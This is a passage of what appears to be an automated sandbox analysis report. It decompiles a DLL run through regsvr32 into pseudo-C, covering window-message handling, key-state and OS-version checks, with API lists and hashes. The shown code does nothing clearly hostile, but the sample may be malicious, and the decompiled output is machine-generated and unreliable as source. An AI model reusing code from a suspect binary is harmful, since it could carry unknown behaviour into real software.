                                                                        															_t304 = E10009FD2( *(_t320[5] + _t410 + 0x14) & 0x0000ffff);
                                                                        															_t90 =  *(_t432 - 0x2c) - 1; // -1
                                                                        															_t419 = _t304 + _t90 &  !(_t304 - 1);
                                                                        															_t392 = ( *((intOrPtr*)( *(_t432 - 0x28) + 0x10)) + _t419 + 0x00000003 & 0xfffffffc) + 0x00000007 & 0xfffffffc;
                                                                        															 *(_t432 - 0x28) = _t392;
                                                                        															 *(_t432 - 0x2c) = _t392 + 4;
                                                                        															E10009F01( *(_t432 - 0x30),  *((intOrPtr*)( *(_t432 - 0x28) + 8)), 0,  *((intOrPtr*)( *(_t432 - 0x28) + 0x10)), 0, 0, 0, _t419,  *((intOrPtr*)( *(_t432 - 0x28) + 0x10)) + _t419 + 0x00000003 & 0xfffffffc,  *(_t432 - 0x28), 0, 0, 0);
                                                                        															_t435 = _t435 + 0x38;
                                                                        															goto L56;
                                                                        														}
                                                                        													} else {
                                                                        														_t67 = ( *(_t432 - 0x2c) + 0x00000003 & 0xfffffffc) + 7; // 0x8
                                                                        														_t396 = _t67 & 0xfffffffc;
                                                                        														 *(_t432 - 0x28) = _t396;
                                                                        														 *(_t432 - 0x2c) = _t396 + 4;
                                                                        														_t419 = 0;
                                                                        														E10009F01( *(_t432 - 0x30),  *((intOrPtr*)(_t272 + 8)), 0,  *(_t272 + 0x10), 0, 0, 0, 0,  *(_t432 - 0x2c) + 0x00000003 & 0xfffffffc,  *(_t432 - 0x28), 0, 0, 1);
                                                                        														_t435 = _t435 + 0x34;
                                                                        														L56:
                                                                        														 *(_t432 - 0x30) =  *(_t432 - 0x30) + 0x34;
                                                                        														 *(_t432 - 0x38) =  *(_t432 - 0x38) + 1;
                                                                        														 *(_t320[5] + _t410 + 4) = _t419;
                                                                        														_t405 =  *(_t432 - 0x38);
                                                                        														continue;
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        											goto L85;
                                                                        										}
                                                                        										__eflags =  *_t320;
                                                                        										if( *_t320 != 0) {
                                                                        											L67:
                                                                        											_t320[2] = _t320[2] & 0x00000000;
                                                                        											 *(_t432 - 4) = 0xa;
                                                                        											_t320[2] = E1001F77E( *(_t432 - 0x2c));
                                                                        											_t249 = _t320[2];
                                                                        											_t405 = 0;
                                                                        											__eflags = _t249;
                                                                        											 *(_t432 - 4) = 0;
                                                                        											if(_t249 != 0) {
                                                                        												E10011C50(_t249, 0,  *(_t432 - 0x2c));
                                                                        												_t418 = E10009DD7( *(_t432 - 0x34), _t320[3],  *_t320,  *(_t432 - 0x2c),  *(_t432 - 0x3c));
                                                                        												__eflags = _t418;
                                                                        												if(__eflags < 0) {
                                                                        													_push(_t320[4]);
                                                                        													L1001F7A9(_t320, 0, _t418, __eflags);
                                                                        													_t320[4] = 0;
                                                                        												}
                                                                        												_push( *(_t432 - 0x34));
                                                                        												L1001F7A9(_t320, _t405, _t418, __eflags);
                                                                        												goto L81;
                                                                        											} else {
                                                                        												__eflags = _t320[3];
                                                                        												if(__eflags > 0) {
                                                                        													_t422 =  *(_t432 - 0x34) + 0x14;
                                                                        													__eflags = _t422;
                                                                        													do {
                                                                        														_push( *_t422);
                                                                        														L1001F7A9(_t320, _t405, _t422, __eflags);
                                                                        														_t405 = _t405 + 1;
                                                                        														_t422 = _t422 + 0x34;
                                                                        														__eflags = _t405 - _t320[3];
                                                                        													} while (__eflags < 0);
                                                                        													_t405 = 0;
                                                                        													__eflags = 0;
                                                                        												}
                                                                        												_push( *(_t432 - 0x34));
                                                                        												L1001F7A9(_t320, _t405, _t419, __eflags);
                                                                        												_push(_t320[4]);
                                                                        												L1001F7A9(_t320, _t405, _t419, __eflags);
                                                                        												_t320[4] = _t405;
                                                                        												goto L74;
                                                                        											}
                                                                        										} else {
                                                                        											_push(1);
                                                                        											_t263 = E10009D73(_t320);
                                                                        											__eflags = _t263;
                                                                        											 *(_t432 - 0x38) = _t263;
                                                                        											if(_t263 >= 0) {
                                                                        												 *((char*)( *_t320 + 4)) = 1;
                                                                        												goto L67;
                                                                        											} else {
                                                                        												_t423 = 0;
                                                                        												__eflags = _t320[3];
                                                                        												if(__eflags > 0) {
                                                                        													_t408 =  *(_t432 - 0x34) + 0x14;
                                                                        													__eflags = _t408;
                                                                        													do {
                                                                        														_push( *_t408);
                                                                        														L1001F7A9(_t320, _t408, _t423, __eflags);
                                                                        														_t423 = _t423 + 1;
                                                                        														_t408 = _t408 + 0x34;
                                                                        														__eflags = _t423 - _t320[3];
                                                                        													} while (__eflags < 0);
                                                                        												}
                                                                        												_push( *(_t432 - 0x34));
                                                                        												L1001F7A9(_t320, _t405, _t423, __eflags);
                                                                        												_push(_t320[4]);
                                                                        												L1001F7A9(_t320, _t405, _t423, __eflags);
                                                                        												_t267 =  *(_t432 - 0x3c);
                                                                        												_t320[4] = _t320[4] & 0x00000000;
                                                                        												 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
                                                                        												__eflags = _t267;
                                                                        												goto L63;
                                                                        											}
                                                                        										}
                                                                        									} else {
                                                                        										_push( *(_t432 - 0x34));
                                                                        										L1001F7A9(_t320, 0, _t419, __eflags);
                                                                        										L74:
                                                                        										_t260 =  *(_t432 - 0x3c);
                                                                        										 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
                                                                        										__eflags = _t260 - _t405;
                                                                        										goto L75;
                                                                        									}
                                                                        								} else {
                                                                        									L15:
                                                                        									_t260 =  *(_t432 - 0x3c);
                                                                        									 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
                                                                        									__eflags = _t260;
                                                                        									L75:
                                                                        									if(__eflags != 0) {
                                                                        										 *((intOrPtr*)( *_t260 + 8))(_t260);
                                                                        									}
                                                                        									_t254 = 0x8007000e;
                                                                        								}
                                                                        							} else {
                                                                        								__eflags = _t315;
                                                                        								if(_t315 != 0) {
                                                                        									 *((intOrPtr*)( *_t315 + 8))(_t315);
                                                                        								}
                                                                        								L81:
                                                                        								_t253 =  *(_t432 - 0x3c);
                                                                        								 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
                                                                        								__eflags = _t253 - _t405;
                                                                        								goto L82;
                                                                        							}
                                                                        						} else {
                                                                        							__eflags = _t313;
                                                                        							 *(_t432 - 4) = 0;
                                                                        							if(_t313 != 0) {
                                                                        								 *((intOrPtr*)( *_t313 + 8))(_t313);
                                                                        							}
                                                                        							_t267 =  *(_t432 - 0x3c);
                                                                        							 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
                                                                        							__eflags = _t267;
                                                                        							L63:
                                                                        							if(__eflags != 0) {
                                                                        								 *((intOrPtr*)( *_t267 + 8))(_t267);
                                                                        							}
                                                                        							_t254 =  *(_t432 - 0x38);
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t253 =  *(_t432 - 0x3c);
                                                                        					 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
                                                                        					_t439 = _t253;
                                                                        					L82:
                                                                        					if(_t439 != 0) {
                                                                        						 *((intOrPtr*)( *_t253 + 8))(_t253);
                                                                        					}
                                                                        					_t254 = _t418;
                                                                        				}
                                                                        				L85:
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t432 - 0xc));
                                                                        				return E100117AE(_t254,  *((intOrPtr*)(_t432 - 0x14)));
                                                                        			}
















































                                                                        0x1000dcd8
                                                                        0x1000dcdb
                                                                        0x1000e0cf
                                                                        0x1000e0cf
                                                                        0x1000e0d2
                                                                        0x1000e0d7
                                                                        0x00000000
                                                                        0x1000e0d7
                                                                        0x1000dc9d
                                                                        0x1000dc9d
                                                                        0x1000dc9d
                                                                        0x1000dca0
                                                                        0x1000dca4
                                                                        0x1000e0d9
                                                                        0x1000e0d9
                                                                        0x1000e0de
                                                                        0x1000e0de
                                                                        0x1000e0e1
                                                                        0x1000e0e1
                                                                        0x1000dc42
                                                                        0x1000dc42
                                                                        0x1000dc44
                                                                        0x1000dc4d
                                                                        0x1000dc4d
                                                                        0x1000e123
                                                                        0x1000e123
                                                                        0x1000e126
                                                                        0x1000e12a
                                                                        0x00000000
                                                                        0x1000e12a
                                                                        0x1000dc0a
                                                                        0x1000dc0a
                                                                        0x1000dc0c
                                                                        0x1000dc10
                                                                        0x1000dc15
                                                                        0x1000dc15
                                                                        0x1000dc18
                                                                        0x1000dc1b
                                                                        0x1000dc1f
                                                                        0x1000e054
                                                                        0x1000e054
                                                                        0x1000e059
                                                                        0x1000e059
                                                                        0x1000e05c
                                                                        0x1000e05c
                                                                        0x1000dc08
                                                                        0x1000dbce
                                                                        0x1000dbce
                                                                        0x1000dbd1
                                                                        0x1000dbd5
                                                                        0x1000e12c
                                                                        0x1000e12c
                                                                        0x1000e131
                                                                        0x1000e131
                                                                        0x1000e134
                                                                        0x1000e134
                                                                        0x1000e136
                                                                        0x1000e139
                                                                        0x1000e14c

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog
                                                                        • String ID: 4
                                                                        • API String ID: 3519838083-4088798008
                                                                        • Opcode ID: 5263575e4b1b058b75a46fc1a6a149590353ccbef09b746fb6c7b92d3e1635fd
                                                                        • Instruction ID: 1dfa92099b7bbb73699ef0bf43d1d48827835450d39971bd9aeca5f6306c0f37
                                                                        • Opcode Fuzzy Hash: 5263575e4b1b058b75a46fc1a6a149590353ccbef09b746fb6c7b92d3e1635fd
                                                                        • Instruction Fuzzy Hash: 8412D071D04245EFEB09DFA4D884AAEBBB1EF44350F25819AF805AF296C771ED40CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1003437E(void* __ecx, signed int _a4, intOrPtr _a8) {
                                                                        				void* __ebx;
                                                                        				void* _t12;
                                                                        				signed char _t15;
                                                                        				void* _t20;
                                                                        
                                                                        				_t20 = __ecx;
                                                                        				_t15 = E100202AB(__ecx);
                                                                        				if(_t15 >= 0 || (_a4 & 0x0000fff0) == 0xf060 && (GetKeyState(0x73) >= 0 || GetKeyState(0x12) >= 0 || (_t15 & 0x00000001) == 0)) {
                                                                        					L6:
                                                                        					return E10031CF0(_t20, _a4, _a8);
                                                                        				}
                                                                        				_t12 = E10023123(_t15, _t20, _a4, _a8);
                                                                        				if(_t12 == 0) {
                                                                        					goto L6;
                                                                        				}
                                                                        				return _t12;
                                                                        			}








                                                                        APIs
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        • GetKeyState.USER32 ref: 100343A8
                                                                        • GetKeyState.USER32 ref: 100343B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: State$LongWindow
                                                                        • String ID:
                                                                        • API String ID: 3716621309-0
                                                                        • Opcode ID: e46d5ed39ef6eba03a240f36095f9537e57856947293e986ff7d6bf58ee9c2d0
                                                                        • Instruction ID: 5de781b028f8a4fce12e3c0fa49c43aff6f22c7add5c7a501000866edff81116
                                                                        • Opcode Fuzzy Hash: e46d5ed39ef6eba03a240f36095f9537e57856947293e986ff7d6bf58ee9c2d0
                                                                        • Instruction Fuzzy Hash: FFF02B3A20021F6EDB13AA55CC81FA93A55DF406E1F024135FD04AF252DE71EE129290
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 58%
                                                                        			E10001100() {
                                                                        				struct _OSVERSIONINFOA _v148;
                                                                        				long _t6;
                                                                        
                                                                        				_v148.dwOSVersionInfoSize = 0x94;
                                                                        				GetVersionExA( &_v148);
                                                                        				if(_v148.dwPlatformId != 2) {
                                                                        					L2:
                                                                        					_t6 = E10001090;
                                                                        				} else {
                                                                        					_t6 = E100010F0;
                                                                        					if(_v148.dwMajorVersion < 5) {
                                                                        						goto L2;
                                                                        					}
                                                                        				}
                                                                        				InterlockedExchange(0x1004b0a0, _t6);
                                                                        				return  *0x1004b0a0();
                                                                        			}






                                                                        APIs
                                                                        • GetVersionExA.KERNEL32 ref: 10001112
                                                                        • InterlockedExchange.KERNEL32(1004B0A0,10001090), ref: 10001136
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ExchangeInterlockedVersion
                                                                        • String ID:
                                                                        • API String ID: 2700998522-0
                                                                        • Opcode ID: 260be64d31472810d38a7c4b3362e1b1b4b1187a9832a1863536309ce5a7bdb4
                                                                        • Instruction ID: cbef01c832245ed46ef0d161ca004d6dcd336c7d999a9848a1027e40418eb20f
                                                                        • Opcode Fuzzy Hash: 260be64d31472810d38a7c4b3362e1b1b4b1187a9832a1863536309ce5a7bdb4
                                                                        • Instruction Fuzzy Hash: E8E08C304043889FF320EB24CD48B9E76F5FB08282FC04828F2A5C200AD734494ACB47
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 22%
                                                                        			E10023973(intOrPtr* __ecx) {
                                                                        				signed int _t141;
                                                                        				signed int _t146;
                                                                        				signed int _t148;
                                                                        				signed int _t149;
                                                                        				unsigned int _t150;
                                                                        				signed int _t152;
                                                                        				signed int _t156;
                                                                        				signed int* _t157;
                                                                        				signed int _t159;
                                                                        				signed int _t161;
                                                                        				unsigned int _t163;
                                                                        				signed int _t167;
                                                                        				signed int _t171;
                                                                        				unsigned int _t174;
                                                                        				signed int _t175;
                                                                        				signed int _t179;
                                                                        				signed int _t180;
                                                                        				signed int* _t184;
                                                                        				signed int _t186;
                                                                        				signed int _t194;
                                                                        				unsigned int _t204;
                                                                        				void* _t206;
                                                                        
                                                                        				_t187 = __ecx;
                                                                        				E10011BF0(0x1003a61c, _t206);
                                                                        				 *(_t206 - 0x10) =  *(_t206 - 0x10) & 0x00000000;
                                                                        				_t179 =  *(_t206 + 8);
                                                                        				_t201 = __ecx;
                                                                        				if(_t179 != 0x111) {
                                                                        					if(_t179 != 0x4e) {
                                                                        						_t204 =  *(_t206 + 0x10);
                                                                        						if(_t179 == 6) {
                                                                        							E100233A0(_t187, _t201,  *((intOrPtr*)(_t206 + 0xc)), E100220EE(_t206, _t204));
                                                                        						}
                                                                        						if(_t179 != 0x20) {
                                                                        							L10:
                                                                        							_t141 =  *(_t201 + 0x48);
                                                                        							if(_t141 == 0) {
                                                                        								L19:
                                                                        								_t180 =  *((intOrPtr*)( *_t201 + 0x28))();
                                                                        								 *(_t206 - 0x14) = _t180;
                                                                        								E10037A1B(7);
                                                                        								_t184 = 0x1004d5f8 + (((_t180 ^  *(_t206 + 8)) & 0x000001ff) + ((_t180 ^  *(_t206 + 8)) & 0x000001ff) * 2) * 4;
                                                                        								_t146 =  *(_t206 - 0x14);
                                                                        								if( *(_t206 + 8) !=  *_t184) {
                                                                        									L24:
                                                                        									 *_t184 =  *(_t206 + 8);
                                                                        									_t184[2] = _t146;
                                                                        									while(1) {
                                                                        										if(_t146 == 0) {
                                                                        											break;
                                                                        										}
                                                                        										_t147 =  *(_t206 - 0x14);
                                                                        										_push(0);
                                                                        										_push(0);
                                                                        										if( *(_t206 + 8) >= 0xc000) {
                                                                        											_t148 =  *(_t147 + 4);
                                                                        											while(1) {
                                                                        												_push(0xc000);
                                                                        												_push(_t148);
                                                                        												_t149 = E10020CD3();
                                                                        												 *(_t206 + 0x10) = _t149;
                                                                        												if(_t149 == 0) {
                                                                        													break;
                                                                        												}
                                                                        												_t150 =  *(_t206 + 0x10);
                                                                        												_t152 =  *(_t206 + 0x10);
                                                                        												if( *((intOrPtr*)( *((intOrPtr*)(_t150 + 0x10)))) ==  *(_t206 + 8)) {
                                                                        													_t184[1] = _t152;
                                                                        													E10037A7E(7);
                                                                        													L105:
                                                                        													_t156 =  *((intOrPtr*)( *((intOrPtr*)( *(_t206 + 0x10) + 0x14))))( *((intOrPtr*)(_t206 + 0xc)), _t204);
                                                                        													L106:
                                                                        													 *(_t206 - 0x10) = _t156;
                                                                        													goto L107;
                                                                        												}
                                                                        												_push(0);
                                                                        												_push(0);
                                                                        												_t148 = _t152 + 0x18;
                                                                        											}
                                                                        											L34:
                                                                        											_t146 =  *( *(_t206 - 0x14));
                                                                        											 *(_t206 - 0x14) = _t146;
                                                                        											continue;
                                                                        										}
                                                                        										_push( *(_t206 + 8));
                                                                        										_push( *(_t147 + 4));
                                                                        										_t161 = E10020CD3();
                                                                        										 *(_t206 + 0x10) = _t161;
                                                                        										if(_t161 == 0) {
                                                                        											goto L34;
                                                                        										}
                                                                        										_t184[1] = _t161;
                                                                        										E10037A7E(7);
                                                                        										L28:
                                                                        										_t163 =  *(_t206 + 0x10);
                                                                        										_t184 =  *(_t163 + 0x14);
                                                                        										_t147 =  *(_t163 + 0x10);
                                                                        										_t194 =  *(_t163 + 0x10) - 1;
                                                                        										if(_t194 > 0x40) {
                                                                        											goto L107;
                                                                        										}
                                                                        										switch( *((intOrPtr*)(_t194 * 4 +  &M10023E7A))) {
                                                                        											case 0:
                                                                        												_push( *(__ebp + 0xc));
                                                                        												_push(E10029068());
                                                                        												goto L55;
                                                                        											case 1:
                                                                        												_push( *(__ebp + 0xc));
                                                                        												goto L55;
                                                                        											case 2:
                                                                        												_push(__esi >> 0x10);
                                                                        												__eax = __si & 0x0000ffff;
                                                                        												_push(__si & 0x0000ffff);
                                                                        												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
                                                                        												goto L59;
                                                                        											case 3:
                                                                        												_push(__esi);
                                                                        												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
                                                                        												goto L84;
                                                                        											case 4:
                                                                        												_push(__esi);
                                                                        												L55:
                                                                        												__ecx = __edi;
                                                                        												__eax =  *__ebx();
                                                                        												goto L106;
                                                                        											case 5:
                                                                        												__ecx = __ebp - 0x24;
                                                                        												E10028C26(__ebp - 0x24) =  *(__esi + 4);
                                                                        												 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
                                                                        												__ecx = __ebp - 0x74;
                                                                        												 *(__ebp - 0x20) =  *(__esi + 4);
                                                                        												__eax = E10021613(__ebp - 0x74, __eflags);
                                                                        												__eax =  *__esi;
                                                                        												__esi =  *(__esi + 8);
                                                                        												_push(__eax);
                                                                        												 *(__ebp - 4) = 1;
                                                                        												 *(__ebp - 0x58) = __eax;
                                                                        												__eax = E10022115();
                                                                        												__eflags = __eax;
                                                                        												if(__eax == 0) {
                                                                        													__eax =  *(__edi + 0x48);
                                                                        													__eflags = __eax;
                                                                        													if(__eax != 0) {
                                                                        														__ecx = __eax + 0x20;
                                                                        														__eax = E1001E69B(__eax + 0x20,  *(__ebp - 0x58));
                                                                        														__eflags = __eax;
                                                                        														if(__eax != 0) {
                                                                        															 *(__ebp - 0x28) = __eax;
                                                                        														}
                                                                        													}
                                                                        													__eax = __ebp - 0x74;
                                                                        												}
                                                                        												_push(__esi);
                                                                        												_push(__eax);
                                                                        												__eax = __ebp - 0x24;
                                                                        												_push(__ebp - 0x24);
                                                                        												__ecx = __edi;
                                                                        												__eax =  *__ebx();
                                                                        												 *(__ebp - 0x20) =  *(__ebp - 0x20) & 0x00000000;
                                                                        												 *(__ebp - 0x58) =  *(__ebp - 0x58) & 0x00000000;
                                                                        												__ecx = __ebp - 0x74;
                                                                        												 *(__ebp - 0x10) = __ebp - 0x24;
                                                                        												 *(__ebp - 4) = 0;
                                                                        												__eax = E10022977(__ebp - 0x74);
                                                                        												goto L51;
                                                                        											case 6:
                                                                        												__ecx = __ebp - 0x24;
                                                                        												E10028C26(__ebp - 0x24) =  *(__esi + 4);
                                                                        												_push( *(__esi + 8));
                                                                        												 *(__ebp - 0x20) =  *(__esi + 4);
                                                                        												__eax = __ebp - 0x24;
                                                                        												_push(__ebp - 0x24);
                                                                        												__ecx = __edi;
                                                                        												 *(__ebp - 4) = 2;
                                                                        												__eax =  *__ebx();
                                                                        												_t89 = __ebp - 0x20;
                                                                        												 *_t89 =  *(__ebp - 0x20) & 0x00000000;
                                                                        												__eflags =  *_t89;
                                                                        												 *(__ebp - 0x10) = __ebp - 0x24;
                                                                        												L51:
                                                                        												 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
                                                                        												__ecx = __ebp - 0x24;
                                                                        												__eax = E100290DE(__ebp - 0x24);
                                                                        												goto L107;
                                                                        											case 7:
                                                                        												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                        												_push( *(__ebp + 0xc) >> 0x10);
                                                                        												__eax = E100220EE(__ebp, __esi);
                                                                        												goto L58;
                                                                        											case 8:
                                                                        												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                        												_push( *(__ebp + 0xc) >> 0x10);
                                                                        												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                        												goto L84;
                                                                        											case 9:
                                                                        												_push(__esi);
                                                                        												_push( *(__ebp + 0xc));
                                                                        												goto L85;
                                                                        											case 0xa:
                                                                        												_push(__esi);
                                                                        												_push(E10026280());
                                                                        												__eax =  *(__ebp + 0xc);
                                                                        												__eax =  *(__ebp + 0xc) >> 0x10;
                                                                        												__eflags = __eax;
                                                                        												L58:
                                                                        												_push(__eax);
                                                                        												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                        												L59:
                                                                        												_push(__eax);
                                                                        												__ecx = __edi;
                                                                        												__eax =  *__ebx();
                                                                        												goto L106;
                                                                        											case 0xb:
                                                                        												__ecx = __edi;
                                                                        												__eax =  *__ebx();
                                                                        												goto L107;
                                                                        											case 0xc:
                                                                        												_push( *(__ebp + 0xc));
                                                                        												goto L91;
                                                                        											case 0xd:
                                                                        												_push(__esi);
                                                                        												goto L88;
                                                                        											case 0xe:
                                                                        												__eax =  *(__ebp + 0xc);
                                                                        												__eax =  *(__ebp + 0xc) >> 0x10;
                                                                        												__eflags = __eax;
                                                                        												_push(__eax);
                                                                        												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                        												goto L63;
                                                                        											case 0xf:
                                                                        												__esi = __esi >> 0x10;
                                                                        												__eax = __ax;
                                                                        												_push(__ax);
                                                                        												__eax = __si;
                                                                        												goto L63;
                                                                        											case 0x10:
                                                                        												_push(__esi >> 0x10);
                                                                        												__eax = __si & 0x0000ffff;
                                                                        												goto L95;
                                                                        											case 0x11:
                                                                        												_push(E100220EE(__ebp, __esi));
                                                                        												L88:
                                                                        												_push( *(__ebp + 0xc));
                                                                        												goto L89;
                                                                        											case 0x12:
                                                                        												__ecx = __edi;
                                                                        												__eax =  *__ebx();
                                                                        												goto L106;
                                                                        											case 0x13:
                                                                        												_push(E100220EE(__ebp,  *(__ebp + 0xc)));
                                                                        												_push(E100220EE(__ebp, __esi));
                                                                        												__eax = 0;
                                                                        												__eflags =  *((intOrPtr*)(__edi + 0x1c)) - __esi;
                                                                        												_t107 =  *((intOrPtr*)(__edi + 0x1c)) == __esi;
                                                                        												__eflags = _t107;
                                                                        												__eax = 0 | _t107;
                                                                        												goto L67;
                                                                        											case 0x14:
                                                                        												_push( *(__ebp + 0xc));
                                                                        												__eax = E10029068();
                                                                        												goto L69;
                                                                        											case 0x15:
                                                                        												_push( *(__ebp + 0xc));
                                                                        												__eax = E10026280();
                                                                        												goto L69;
                                                                        											case 0x16:
                                                                        												_push(__esi >> 0x10);
                                                                        												__eax = __si & 0x0000ffff;
                                                                        												_push(__si & 0x0000ffff);
                                                                        												_push( *(__ebp + 0xc));
                                                                        												__eax = E10026280();
                                                                        												goto L67;
                                                                        											case 0x17:
                                                                        												_push( *(__ebp + 0xc));
                                                                        												goto L74;
                                                                        											case 0x18:
                                                                        												_push(__esi);
                                                                        												L74:
                                                                        												__eax = E100220EE(__ebp);
                                                                        												L69:
                                                                        												_push(__eax);
                                                                        												goto L91;
                                                                        											case 0x19:
                                                                        												_push(__esi >> 0x10);
                                                                        												__eax = __si & 0x0000ffff;
                                                                        												goto L77;
                                                                        											case 0x1a:
                                                                        												__eax = __si;
                                                                        												__eflags = __esi;
                                                                        												__ecx = __si;
                                                                        												_push(__si);
                                                                        												L77:
                                                                        												_push(__eax);
                                                                        												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
                                                                        												goto L67;
                                                                        											case 0x1b:
                                                                        												_push(__esi);
                                                                        												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
                                                                        												L63:
                                                                        												_push(__eax);
                                                                        												goto L89;
                                                                        											case 0x1c:
                                                                        												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                        												_push( *(__ebp + 0xc) >> 0x10);
                                                                        												__eax = E100220EE(__ebp, __esi);
                                                                        												goto L93;
                                                                        											case 0x1d:
                                                                        												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                                        												__eflags = __eax - 0x27;
                                                                        												__ecx = __cx;
                                                                        												 *((intOrPtr*)(__ebp + 8)) = __cx;
                                                                        												 *(__ebp + 0xc) = __cx;
                                                                        												if(__eax != 0x27) {
                                                                        													_push( *(__ebp + 0xc));
                                                                        													_push( *((intOrPtr*)(__ebp + 8)));
                                                                        													L89:
                                                                        													__ecx = __edi;
                                                                        													__eax =  *__ebx();
                                                                        													goto L107;
                                                                        												}
                                                                        												_push(E100220EE(__ebp, __esi));
                                                                        												_push( *(__ebp + 0xc));
                                                                        												_push( *((intOrPtr*)(__ebp + 8)));
                                                                        												goto L96;
                                                                        											case 0x1e:
                                                                        												_push(__esi);
                                                                        												L91:
                                                                        												__ecx = __edi;
                                                                        												__eax =  *__ebx();
                                                                        												goto L107;
                                                                        											case 0x1f:
                                                                        												_push(__esi);
                                                                        												_push( *(__ebp + 0xc));
                                                                        												__ecx = __edi;
                                                                        												__eax =  *__ebx();
                                                                        												goto L98;
                                                                        											case 0x20:
                                                                        												__eax = __si;
                                                                        												__eflags = __esi;
                                                                        												__ecx = __si;
                                                                        												_push(__si);
                                                                        												L84:
                                                                        												_push(__eax);
                                                                        												L85:
                                                                        												__ecx = __edi;
                                                                        												__eax =  *__ebx();
                                                                        												goto L106;
                                                                        											case 0x21:
                                                                        												__eax =  *(__ebp + 0xc);
                                                                        												_push(__esi);
                                                                        												__eax =  *(__ebp + 0xc) >> 0x10;
                                                                        												__eflags = __eax;
                                                                        												L93:
                                                                        												_push(__eax);
                                                                        												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                        												L67:
                                                                        												_push(__eax);
                                                                        												goto L96;
                                                                        											case 0x22:
                                                                        												__eax = __si;
                                                                        												__eflags = __esi;
                                                                        												__ecx = __si;
                                                                        												_push(__si);
                                                                        												L95:
                                                                        												_push(__eax);
                                                                        												_push( *(__ebp + 0xc));
                                                                        												L96:
                                                                        												__ecx = __edi;
                                                                        												__eax =  *__ebx();
                                                                        												goto L107;
                                                                        											case 0x23:
                                                                        												__eax = __si & 0x0000ffff;
                                                                        												_push(__esi);
                                                                        												_push(__si & 0x0000ffff);
                                                                        												__eax =  *(__ebp + 0xc);
                                                                        												__eax =  *(__ebp + 0xc) >> 0x10;
                                                                        												__eflags = __eax;
                                                                        												_push(__eax);
                                                                        												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                                        												_push( *(__ebp + 0xc) & 0x0000ffff);
                                                                        												__ecx = __edi;
                                                                        												__eax =  *__ebx();
                                                                        												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
                                                                        												L100:
                                                                        												__eflags = _t175;
                                                                        												if(_t175 != 0) {
                                                                        													goto L107;
                                                                        												}
                                                                        												goto L37;
                                                                        											case 0x24:
                                                                        												goto L107;
                                                                        											case 0x25:
                                                                        												__ecx = __edi;
                                                                        												__eax =  *__ebx();
                                                                        												__eflags = __eax;
